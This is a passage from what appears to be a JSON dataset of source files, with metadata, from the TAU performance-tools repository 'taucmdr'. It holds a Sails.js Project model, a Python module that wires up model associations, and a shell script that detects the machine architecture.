argparse.SUPPRESS\n else:\n if use_defaults and default:\n options['default'] = default\n else:\n options['default'] = argparse.SUPPRESS \n try:\n 
group_name = options['group'] + ' arguments'\n except KeyError:\n group = parser\n else:\n del options['group']\n groups.setdefault(group_name, parser.add_argument_group(group_name))\n group = groups[group_name]\n try:\n flags = options['flags']\n except KeyError:\n flags = (attr,)\n else:\n del options['flags']\n options['dest'] = attr\n group.add_argument(*flags, **options)\n return parser\n" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.5564236044883728, "avg_line_length": 17.59677505493164, "blob_id": "e9dfeee7b37939de56af8cfda3e70fee171a359b", "content_id": "8ca05ce6f310684ff7b899cd0a4bd4c83f6b6186", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1152, "license_type": "permissive", "max_line_length": 108, "num_lines": 62, "path": "/commander/api/models/Project.js", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "/**\n* Project.js\n*\n* @description :: TODO: You might write a short summary of how this model works and what it represents here.\n* @docs :: http://sailsjs.org/#!documentation/models\n*/\n\nmodule.exports = {\n\n schema: true,\n \n attributes: {\n\n // One-to-many association\n user: {\n model: 'User',\n required: true \n },\n\n // Project name\n name: {\n type: 'string',\n required: true\n },\n\n // Targets used by this project (N-N)\n targets: {\n collection: 'Target',\n via: 'projects',\n dominant: true\n },\n\n // Applications used by this project (N-N)\n applications: {\n collection: 'Application',\n via: 'projects',\n dominant: true\n },\n\n // Measurements used by this project (N-N)\n measurements: {\n collection: 'Measurement',\n via: 'projects',\n dominant: true\n },\n\n // Debuggers used by this project (N-N)\n debuggers: {\n collection: 'Debugger',\n via: 'projects',\n dominant: true\n },\n\n // Trials generated by this project (1-N)\n trials: {\n collection: 'Trial',\n via: 'project',\n dominant: true\n }\n\n }\n};" }, { "alpha_fraction": 0.6573324799537659, "alphanum_fraction": 0.6594067811965942, "avg_line_length": 34.43382263183594, "blob_id": "d22b2248db2d8075a9f3dd1642173d1ea1a685bb", "content_id": "259f90114482b7213f7fbf874d73c77b1138b983", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4821, "license_type": "permissive", "max_line_length": 88, "num_lines": 136, "path": "/packages/tau/model/__init__.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief \n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. 
nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport sys\nfrom pkgutil import walk_packages\n\n# TAU modules\nimport logger\nimport error\nimport controller\n\nModelError = controller.ModelError\n\n# List model classes\ndef _yieldModelClasses():\n for _, module_name, _ in walk_packages(__path__, __name__+'.'):\n __import__(module_name)\n module_dict = sys.modules[module_name].__dict__\n model_class_name = module_name.split('.')[-1].capitalize()\n try:\n model_class = module_dict[model_class_name]\n except KeyError:\n raise error.InternalError(\"module '%s' does not define class '%s'\" % \n (module_name, model_class_name))\n yield model_class\nMODEL_CLASSES = list(_yieldModelClasses())\n\n# Index model classes by name\nMODELS = dict([(cls.__name__, cls) for cls in MODEL_CLASSES])\n\n\ndef _getPropsModelName(props):\n try:\n return props['model']\n except KeyError:\n return props['collection']\n\n# Set cls.model_name\nfor cls_name, cls in MODELS.iteritems():\n cls.model_name = cls_name\n\n# Set cls.associations\nfor cls_name, cls in MODELS.iteritems():\n if not hasattr(cls, 'associations'):\n cls.associations = {}\n if not hasattr(cls, 'references'):\n cls.references = set()\n\n for attr, props in cls.attributes.iteritems():\n via = props.get('via', None)\n try:\n foreign_name = _getPropsModelName(props)\n except KeyError:\n if via:\n raise ModelError(cls, \"Attribute '%s' defines 'via' property \"\n \"but not 'model' or 'collection'\" % attr)\n else:\n continue\n \n try:\n foreign_cls = MODELS[foreign_name]\n except KeyError:\n raise ModelError(cls, \"Invalid model name in attribute '%s'\" % attr)\n if not hasattr(foreign_cls, 'associations'):\n foreign_cls.associations = {}\n if not hasattr(foreign_cls, 'references'):\n foreign_cls.references = set()\n \n forward = (foreign_cls, via)\n reverse = (cls, attr)\n if not via:\n foreign_cls.references.add(reverse)\n else:\n foreign_cls.associations[via] = reverse\n try:\n via_props = foreign_cls.attributes[via]\n except KeyError:\n raise ModelError(cls, \"Found 'via' on undefined attribute '%s.%s'\" % \n (foreign_name, via))\n try:\n via_attr_model_name = _getPropsModelName(via_props)\n except KeyError:\n raise ModelError(cls, \"Found 'via' on non-model attribute '%s.%s'\" % \n (foreign_name, via))\n if via_attr_model_name != cls_name:\n raise ModelError(cls, \"Attribute %s.%s referenced by 'via' in '%s' \"\n \"does not define 'collection' or 'model' of type '%s'\" % \n (foreign_name, via, attr, cls_name))\n try:\n existing = cls.associations[attr]\n except KeyError:\n cls.associations[attr] = forward\n else:\n if existing != forward:\n raise 
ModelError(cls, \n \"Conflicting associations on attribute '%s': \" \n \"%r vs. %r\" % (attr, existing, forward))\n \n# Clean up\ndel _yieldModelClasses\ndel _getPropsModelName \n\n" }, { "alpha_fraction": 0.5455046892166138, "alphanum_fraction": 0.567291796207428, "avg_line_length": 19.70857048034668, "blob_id": "25cc9a7d03d7fc0ec0fb3d2f1bc4d70b974af576", "content_id": "dafa7f7ecb7695b522ac3e8904c8032984385124", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3626, "license_type": "permissive", "max_line_length": 109, "num_lines": 175, "path": "/packages/tau/util/archfind/archfind", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "#!/bin/sh \n\n# converted to sh, (12/14/2007)\n\n# Based on parts of tcsh's tc.vers.c && PVM's aimk\n\n# Originally hacked by Bernd Mohr\n# Modified by Pete Beckman (3/2/95)\n# Modified by Lars Thomas Hansen (2/27/95); very minor fixes for Solaris\n\n# Command line parameters:\n# -x provide cross-development architecture name (for cm?, rs6k, etc)\n# -l provide long name\n# -s SPECIAL. Used to differentiate two very similar architectures\n\n#echo foo\nARCHTESTFILE=$0.c\nARCHLISTFILE=$0.txt\nARCH=\nXDEV=\nSPECIAL=\n\n# TAU_CCOM may be defined by the caller to the name of the c compiler\n# for this user and system, as given on the command line.\n#\n# Not everyone uses gcc.\n\nif [ \"x$TAU_CCOM\" = \"x\" ]; then\n TAU_CCOM=cc\nfi\n\nif [ `uname -s ` = \"Darwin\" ]; then\n TAU_CCOM=c++\n ARCH=apple\nfi\n\n# check for ARM linux so it covers uname -m output such as armv7l or arm*\nuname_output=`uname -m`\nmatch_string=\"arm\"\ntest_arg=${uname_output#$match_string}\nif [ \"y$test_arg\" != \"y$uname_output\" ]\nthen\n TAU_CCOM=gcc\n ARCH=arm_linux\nfi\n\n#if [ -d /usr/linux-k1om-* ]\n#then\n# ARCH=mic_linux\n#fi\n\nif [ `uname -s ` = \"HI-UX/MPP\" ]; then \n ARCH=`$TAU_CCOM $MSG_EQ_E -E $ARCHTESTFILE | sed -e '/^#/d' -e '/^[ ]*$/d' -e 's/^ARCH//'` \nelse\n if [ \"x$ARCH\" = \"x\" ]; then\n# ARCH has not been assigned yet.\n if [ \"x$PE_ENV\" = \"xCRAY\" ]; then\n TAU_W_FLAG=\"\" \n else\n TAU_W_FLAG=-w\n fi\n ARCH=`$TAU_CCOM $TAU_W_FLAG -E $ARCHTESTFILE | sed -e '/^#/d' -e '/^[ ]*$/d' -e 's/^ARCH//'` \n\n if [ \"$TAU_CCOM\" = \"mcc\" ] ; then\n ARCH=`$TAU_CCOM $TAU_W_FLAG -E $ARCHTESTFILE | sed -e '/^#/d' -e '/^[ ]*$/d' -e 's/^ARCH//' | tail -1` \n fi\n\n if [ \"x$ARCH\" = \"x\" ] ; then \n\t exit\n fi\n fi\nfi\n\n# Check for brain-dead solaris compiler\nif [ \"$ARCH\" = \"sun4\" ]; then\n VER=`uname -r | cut -c0-2`\n if [ $VER = \"5.\" ]; then\n\tARCH=solaris2\n fi\nfi\n\n\n# Check for SGI Symmetric Multiprocessing engine\nif [ \"$ARCH\" = \"sgi4k\" -o \"$ARCH\" = \"sgi8k\" ]; then\n # Run \"hinv\" and check for the number of processors\n /bin/hinv 2>&1 | /usr/bsd/head -1 2>&1 | /bin/grep \"^1 \" &> /dev/null\n if [ $? = 1 ]; then\n\tXDEV=\"sgimp $XDEV\"\n fi\nfi \n\n# Check for Meiko CS2\nif [ \"$ARCH\" = \"solaris2\" -a -d \"/opt/MEIKOcs2\" ]; then\n XDEV=\"cs2 $XDEV\"\nfi\n\n# Check for cray-t3d xdev environment for Cray C90\nif [ \"$ARCH\" = \"c90\" -a -d \"/mpp/bin\" ]; then\n XDEV=\"t3d $XDEV\"\nfi\n\n# Check for Convex SPP engine\nif [ \"$ARCH\" = \"hp9000s800\" ]; then\n if [ -d /usr/convex ]; then\n\tXDEV=\"cnxspp $XDEV\"\n fi\nfi\n\n# Check for RS6000 based IBM SPx\nif [ \"$ARCH\" = \"rs6000\" ]; then\n if [ -f /bin/mpcc ]; then\n\tXDEV=\"sp1 $XDEV\"\n fi\nfi\n\nif [ \"$ARCH\" = \"unknown\" ]; then\n#See if users path finds an 'arch' command, if so, use it! 
(a little sloppy)\n arch > /dev/null 2>&1\n if [ $? != 0 ]; then\n#This machine does not have an 'arch' command\n#Or at least one that correctly sets the arch\n\n#Try another guess....\n\tif [ -e /usr/bin/getcube ]; then\n\t ARCH=i860 \n\tfi\n else\n# 'arch' command found, use it!\n\tARCH=`arch`\n fi\n\n if [ \"$ARCH\" = \"unknown\" ]; then\n\tif [ `uname -s` = \"FreeBSD\" ]; then\n\t ARCH=freebsd\n\tfi\n fi\n\n if [ $# = 1 ]; then\n\tif [ \"$1\" = \"-x\" ]; then\n\t if [ \"x$XDEV\" = \"x\" ]; then\n\t\techo none\n\t\texit 1\n\t else\n\t\techo $XDEV\n\t\texit 0\n\t fi\n\telse\n\t if [ \"$1\" = \"-l\" ]; then\n\t\tgrep $ARCH $ARCHLISTFILE\n\t\tif [ $ARCH = \"unknown\" ]; then\n\t\t exit 1\n\t\telse\n\t\t exit 0\n\t\tfi\n\t else\n\t\tif [ \"$1\" = \"-s\" ]; then\n\t\t if [ \"x$SPECIAL\" = \"x\" ]; then\n\t\t\techo none\n\t\t\texit 1\n\t\t else\n\t\t\techo $SPECIAL\n\t\t\texit 0\n\t\t fi\n\t\tfi\n\t fi\n\tfi\n fi\nfi\n\necho $ARCH\nif [ \"$ARCH\" = \"unknown\" ]; then\n exit 1\nelse\n exit 0\nfi\n\n\n" } ]
49
Bartvds/django-decorator-include
https://github.com/Bartvds/django-decorator-include
93fc52dc4a8c34fd8ef1c84cef35e8878eb29a9c
10fb1775dded482cc16dec5a619efafd8b42fec6
ffe358e5cb02bfdc3422dec20140fadd6405cf71
refs/heads/master
2021-01-20T15:18:45.062701
2016-12-28T21:31:11
2016-12-28T21:31:11
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.33157894015312195, "alphanum_fraction": 0.44736841320991516, "avg_line_length": 24.909090042114258, "blob_id": "a7dd7123da14fc8ffd86a5300a6fcbf1c5af101e", "content_id": "dd5f86f4386f2f563cb5f2a9fabc41ad4b066482", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 570, "license_type": "permissive", "max_line_length": 55, "num_lines": 22, "path": "/CHANGELOG.rst", "repo_name": "Bartvds/django-decorator-include", "src_encoding": "UTF-8", "text": "Changelog\n=========\n\nRelease *v1.2* - ``2016-12-28``\n---------------------------------\n* official support for Django 1.10\n\nRelease *v1.1* - ``2016-12-15``\n-------------------------------\n* stop importing module in ``__init__``\n\nRelease *v1.0* - ``2016-03-13``\n---------------------------------\n* first official release, adding support for Django 1.9\n\nRelease *v0.2* - ``2014-11-09``\n---------------------------------\n* support for Python 3 and Django 1.6+\n\nRelease *v0.1* - ``2014-03-18``\n---------------------------------\n* initial version by Jeff Kistler (data: 2011-06-07)\n" }, { "alpha_fraction": 0.6696428656578064, "alphanum_fraction": 0.7321428656578064, "avg_line_length": 36.66666793823242, "blob_id": "c277f3bd03bb56abd7443bde6feb2852746f54ca", "content_id": "5455544099af0bfc93517fce5e8bbec355c12922", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 112, "license_type": "permissive", "max_line_length": 58, "num_lines": 3, "path": "/AUTHORS.rst", "repo_name": "Bartvds/django-decorator-include", "src_encoding": "UTF-8", "text": "``decorator_include`` was written by Jeff Kistler in 2011.\n\nAdapted for py3 and django 1.6+ by Stephane \"twidi\" Angel." 
}, { "alpha_fraction": 0.704365074634552, "alphanum_fraction": 0.7073412537574768, "avg_line_length": 24.200000762939453, "blob_id": "65365ff6a404b57ef57cf4dd88380c87b042a947", "content_id": "b35aee66b1e72531ba3e044ec72a5e04c3bc859c", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1008, "license_type": "permissive", "max_line_length": 62, "num_lines": 40, "path": "/src/decorator_include/tests/testproject/settings.py", "repo_name": "Bartvds/django-decorator-include", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals\nimport os.path\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nSECRET_KEY = '8qw5o&7!g&4kg#+4jr6y%qoj6(1s1ufjqo1#x)fqaca&)$2)ba'\n\nBASE_DIR = os.path.dirname(__file__)\n\ndef absolute_path(path):\n return os.path.normpath(os.path.join(BASE_DIR, path))\n\nSITE_ID = 1\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': absolute_path('database.sqlite3'),\n }\n}\n\nINSTALLED_APPS = [\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'decorator_include',\n]\n\nROOT_URLCONF = 'decorator_include.tests.urls'\n\nMIDDLEWARE_CLASSES = [\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n" }, { "alpha_fraction": 0.7517730593681335, "alphanum_fraction": 0.7517730593681335, "avg_line_length": 27.200000762939453, "blob_id": "f586a41a6945f81598d0c2edc26b8ace38886400", "content_id": "5eaf2901748741198b3f9fd942fa37c883610e64", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 423, "license_type": "permissive", "max_line_length": 93, "num_lines": 15, "path": "/src/decorator_include/tests/urls.py", "repo_name": "Bartvds/django-decorator-include", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals\nfrom django.conf.urls import url\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\n\nfrom decorator_include import decorator_include\n\n\ndef index(request):\n return HttpResponse('Index!')\n\nurlpatterns = [\n url(r'^$', index, name='index'),\n url(r'^include/', decorator_include(login_required, 'decorator_include.tests.included')),\n]\n" } ]
4
Bryantmj/Final
https://github.com/Bryantmj/Final
998ea1535937893305c5b3bd235f40d6aa284f41
f5f202ed799dce863a4c4ce7d1361beded250ac0
2a3a7ff189b0c95f689c38f2a03b1b30f4fb01bf
refs/heads/master
2021-08-30T22:44:26.930816
2017-12-19T17:37:51
2017-12-19T17:37:51
114,793,073
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6255778074264526, "alphanum_fraction": 0.6312275528907776, "avg_line_length": 24.946666717529297, "blob_id": "6f8b83e35d5f0a092fe4372ce61de5c9e9bd7031", "content_id": "cfd8c495da2f50b17c0fe14b0358ed08c35e2d9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1947, "license_type": "no_license", "max_line_length": 98, "num_lines": 75, "path": "/finsl", "repo_name": "Bryantmj/Final", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys\n\n\ndata = open(\"restaurants.csv\", \"r\")\nlines = data.readlines()\nrestaurant_name = []\nrestaurant_time = []\nrestaurant_food = []\nrestaurant_waittime = []\n\n\nfor line in lines:\n info = line.rstrip().split(\",\")\n restaurant_name.append(info[1])\n restaurant_time.append(info[2])\n restaurant_food.append(info[3])\n restaurant_waittime.append(info[4])\n\n\ndef close_restaurants():\n for i in range(1, len(restaurant_name)):\n if restaurant_waittime[i] == \"Three\" or \"Four\":\n print restaurant_name[i], \"is only \", restaurant_time[i], \" minutes away\"\n\n\ndef fast_restaurant():\n for i in range(1, len(restaurant_waittime)):\n if restaurant_waittime[i] == \"Low\":\n print restaurant_name[i], \"has a low estimated wait time\"\n\n\ndef choose_food():\n n = raw_input(\"Enter a food category: \")\n for i in range (1, len(restaurant_food)):\n if restaurant_food[i] == n:\n print \"These restaurants: \", restaurant_name[i], \"have \", restaurant_food[i]\n\ndef choose_restaurant():\n n = raw_input(\"Enter a restaurant name: \")\n for i in range (1, len(restaurant_name)):\n if restaurant_name[i] == n:\n print \"There is a \", restaurant_name[i], restaurant_time[i], \" minutes away from you \"\n\n\ndef most_common_food(restaurant_food):\n restaurant_food = []\n for row in range(0, restaurant_food):\n if restaurant_food[i] not in restaurant_food:\n food_list.append(restaurant_food[i])\n\n food_counts = []\n for food in food_list:\n total = 0\n for restaurant_food in restaurant_food:\n if restaurant_food == food:\n total += 1\n\n food_counts.append(total)\n\n return max(food_counts)\n\nprint \" \"\nprint \"My Final Project\"\nprint \" \"\nprint close_restaurants\nprint \" \"\nprint fast_restaurant\nprint \" \"\nprint choose_food\nprint \" \"\nprint choose_restaurant\nprint \" \"\nprint most_common_food\nprint \" \" \n" } ]
1
zsscode/DepressionResearch
https://github.com/zsscode/DepressionResearch
31e5a32436fec913a4e59409295d4ff4cd984e54
42aa695de51cad4a1b064f0ccbdf2b9ac1fb20ec
ac3205bd336ab67df694f8634ccce10dff280faf
refs/heads/master
2020-06-14T16:05:10.745169
2019-06-12T17:00:01
2019-06-12T17:00:01
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6971069574356079, "alphanum_fraction": 0.703490138053894, "avg_line_length": 46.84236526489258, "blob_id": "2615143cf942f711fbe2b515e2f9fceee28940c8", "content_id": "b7f6ed2dcd2257d9497ab34db365d4f661ed450b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9713, "license_type": "no_license", "max_line_length": 129, "num_lines": 203, "path": "/pipelineHelperFunctions.py", "repo_name": "zsscode/DepressionResearch", "src_encoding": "UTF-8", "text": "import re\nimport requests\nimport json\nimport os\nimport pandas as pd\nimport numpy as np\nimport warnings\nimport matplotlib.pyplot as plt\nwarnings.simplefilter(\"ignore\")\n\nfrom sklearn.decomposition import PCA\nfrom scipy.sparse import hstack\nfrom sklearn.svm import LinearSVC\nfrom nltk.corpus import stopwords\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.preprocessing import LabelEncoder, normalize, Normalizer, MinMaxScaler\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.decomposition import NMF, LatentDirichletAllocation\nfrom sklearn.model_selection import train_test_split,cross_val_score\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\n\n\ndef TitleClassifier(io_df):\n target = 'subreddit'\n cols = 'title'\n\n X = io_df[cols]\n y = io_df[target]\n\n count_vect = CountVectorizer(stop_words='english', lowercase=True, analyzer='word')\n X = count_vect.fit_transform(X)\n tfidf_transformer = TfidfTransformer()\n X = tfidf_transformer.fit_transform(X)\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n svc = LinearSVC(random_state=42, penalty='l2', dual=True, tol=0.0001, C=1,\n fit_intercept=True, intercept_scaling=1.0, class_weight=None)\n svc.fit(X_train, y_train)\n y_pred = svc.predict(X_test)\n score = svc.score(X_test, y_test)\n\n print(\"First Classifier - Title (with SVM)\\n\")\n print(\"Accuracy Score:\", score)\n print(confusion_matrix(y_pred=y_pred, y_true=y_test))\n print(\"AUC Score:\", np.mean(cross_val_score(svc, X_train, y_train, cv=10, scoring='roc_auc')))\n\n feature_names = np.array(count_vect.get_feature_names())\n sorted_coef_index = svc.coef_[0].argsort()\n\n print('\\nSmallest Coefs: \\n{}\\n'.format(feature_names[sorted_coef_index[:10]]))\n print('Largest Coefs: \\n{}\\n'.format(feature_names[sorted_coef_index[:-11:-1]]))\n\n return svc, count_vect\n\ndef CleanData(dataset):\n dataset['post_text'] = dataset['post_text'].fillna('')\n dataset = dataset[dataset['post_text'] != '[removed]']\n dataset['post_text'] = dataset['post_text'].apply(lambda x: x.replace('\\r', ''))\n dataset['post_text'] = dataset['post_text'].apply(lambda x: x.replace('\\n', ''))\n dataset['post_text'] = dataset['post_text'].apply(lambda x: x.replace(\"\\'\", \"\"))\n dataset = dataset.dropna()\n dataset = dataset.reset_index()\n\n return dataset\n\ndef GetRegularExpressions(io_FullDF):\n # Find by using regular expressions all the sentences\n # which are built in the following way: \"i ...... 
anxi/ety/ous/olytic and so on\"\n keywordToFilterBy = input(\"Enter keyword to run regular expressions on\\n\")\n myRegEx = r'\\bi\\s.*\\b' + keywordToFilterBy + r'[\\w]*\\b'\n count = 0\n sentences = []\n post = []\n subreddits = []\n for row in io_FullDF.iterrows():\n\n sentence = row[1]['post_text']\n sentencesContainingRegEx = re.findall(myRegEx, sentence)\n if len(sentencesContainingRegEx) > 0:\n post.append(row[1]['submission_id'])\n subreddits.append(row[1]['subreddit'])\n sentences.append(sentence)\n count += 1\n print(\"Amount of posts containing the regular expression: \", count)\n return post\n\ndef GetDepressionGroupUsersNeutralPosts(i_RegularExpressionsPosts, io_FullDF):\n\n # Take n largest subreddit by appreance in the filtered dataset\n n_largest = list(i_RegularExpressionsPosts['subreddit'].value_counts().nlargest(7).keys())\n\n # Create the final depressed testing group to be compared with neutral people\n # by taking the depressed test group user id's, we can create the group's neutral posts\n depressed_group_depressed_posts = i_RegularExpressionsPosts[i_RegularExpressionsPosts['subreddit'].isin(n_largest)]\n depression_group_users = list(set(depressed_group_depressed_posts['user_name']))\n depression_group_users_indices = list(set(depressed_group_depressed_posts['user_name'].index))\n\n # Create a list of all the possible neutral predicted posts which contain our regular expression\n temp_list = list(\n depressed_group_depressed_posts[depressed_group_depressed_posts['predicted'] == 0]['submission_id'].index)\n\n # First, create the dataset comprised of the same users we have in our depression dataset\n # Second, take only the neutral related posts of these users\n # Third, drop out the posts which were filtered by the regular expression and are now considered depression wise\n # Fourth, Filter out empty posts and keep only the ones above 50 words, this leaves us with an almost similar in size dataset\n depression_group_users_neutral_posts = io_FullDF[io_FullDF['user_name'].isin(depression_group_users)]\n depression_group_users_neutral_posts = depression_group_users_neutral_posts[\n depression_group_users_neutral_posts['predicted'] == 0]\n depression_group_users_neutral_posts = depression_group_users_neutral_posts.drop(temp_list, axis=0)\n depression_group_users_neutral_posts = depression_group_users_neutral_posts[\n depression_group_users_neutral_posts['num_words_post'] > 50]\n\n # Create a dataset comprised of all the other users who weren't classified as depressed by our regular expression\n # next, we only want those who we classified by our original classifier, who were predicted as neutral => predicted = 0\n non_depressed_people = io_FullDF.drop(depression_group_users_indices, axis=0).copy()\n non_depressed_people = non_depressed_people[non_depressed_people['predicted'] == 1]\n non_depressed_people = non_depressed_people[non_depressed_people['num_words_post'] > 50]\n\n depression_group_users_neutral_posts = depression_group_users_neutral_posts.reset_index().drop('index', axis=1)\n neutral_total_subreddits = set(depression_group_users_neutral_posts['subreddit'].value_counts().keys())\n\n filtered_neutral_subreddits = list(set(n_largest) ^ neutral_total_subreddits)\n\n depression_group_users_neutral_posts = depression_group_users_neutral_posts[\n depression_group_users_neutral_posts['subreddit'].isin(filtered_neutral_subreddits)]\n\n # Print how many unique users we have for each group:\n print(\"Number of Unique depressed posts users:\", 
len(list(set(depressed_group_depressed_posts['user_name']))))\n print(\"Number of Unique depressed neutral posts users:\",\n len(list(set(depression_group_users_neutral_posts['user_name']))))\n print(\"Number of Unique neutral posts users\", len(list(set(non_depressed_people['user_name']))))\n\n return depression_group_users_neutral_posts\n\ndef ConvertInputToListOfStrings(io_Subreddits):\n io_Subreddits = io_Subreddits.replace(\"'\", \"\")\n io_Subreddits = io_Subreddits.split(',')\n return io_Subreddits\n\ndef GetNeutralAndDepressionSubreddits(io_Whole_data, i_Subreddits):\n neutralSubreddits = []\n depression_subreddits = []\n for i in i_Subreddits:\n values = io_Whole_data[io_Whole_data['subreddit'] == i]['predicted'].value_counts().values\n sum_values = np.sum(io_Whole_data[io_Whole_data['subreddit'] == i]['predicted'].value_counts().values)\n values_perc = values / sum_values\n # value1 = io_Whole_data[io_Whole_data['subreddit'] == i]['predicted'].value_counts().values[0]\n if io_Whole_data[io_Whole_data['subreddit'] == i]['predicted'].value_counts().keys()[0] == 1:\n if values_perc[0] >= 0.7:\n neutralSubreddits.append(i)\n else:\n if values_perc[0] >= 0.7:\n depression_subreddits.append(i)\n\n print(\"Distribution of depression subreddits\\n\")\n print(io_Whole_data[io_Whole_data['subreddit'].isin(depression_subreddits)]['subreddit'].value_counts())\n\n print(\"Distribution of neutral subreddits\\n\")\n print(io_Whole_data[io_Whole_data['subreddit'].isin(neutralSubreddits)]['subreddit'].value_counts())\n return neutralSubreddits, depression_subreddits\n\ndef GetNeutralDepressionUsers(io_WholeData, i_AnxietySubreddits, i_NeutralSubreddits):\n # Split the dataframe to neutral and depressed by the filtered subreddits\n depression_df = io_WholeData[io_WholeData['subreddit'].isin(i_AnxietySubreddits)]\n neutral_df = io_WholeData[io_WholeData['subreddit'].isin(i_NeutralSubreddits)]\n\n print(\"Anxiety group size:\\n\\n\", depression_df.shape)\n print(20 * \"-\")\n print(\"neutral group size:\\n\\n\", neutral_df.shape)\n\n # Get the list of all unique users for each type of dataset\n depression_names = list(set(depression_df['user_name']))\n neutral_names = list(set(neutral_df['user_name']))\n\n # Merge them back to a single dataframe\n full_df = pd.concat([depression_df, neutral_df], axis=0)\n full_df.shape\n\n # Filter out people who havn't posted in both types of subreddits (Depression/Neutral) in the current dataset\n both = []\n for i in depression_names:\n if i in neutral_names:\n both.append(i)\n print(\"Amount of unique users who are in both groups: \", len(both))\n\n anxietyGroupSize = 0\n neutralGroupSize = 0\n for user in depression_names:\n anxietyGroupSize += io_WholeData[io_WholeData['user_name'] == user].shape[0]\n\n for user in neutral_names:\n neutralGroupSize += io_WholeData[io_WholeData['user_name'] == user].shape[0]\n\n print(\"Posts taken from anxious users: \", anxietyGroupSize)\n print(20 * \"-\")\n print(\"Posts taken from neutral users: \", neutralGroupSize)\n\n full_df = full_df[full_df['user_name'].isin(both)]\n full_df = full_df.sort_values(by=['user_name', 'date_created'], ascending=False)\n full_df['num_distinct_words'] = full_df['post_text'].apply(lambda x: len(set(x.split())))\n\n return full_df\n\n" }, { "alpha_fraction": 0.716057300567627, "alphanum_fraction": 0.7204039692878723, "avg_line_length": 45.84431076049805, "blob_id": "c6a33c17a9951de2cac8febdff1cf9894699ca3d", "content_id": "636b28a3f0955d5c2b89d83a2ca3332e94c6148e", "detected_licenses": [], 
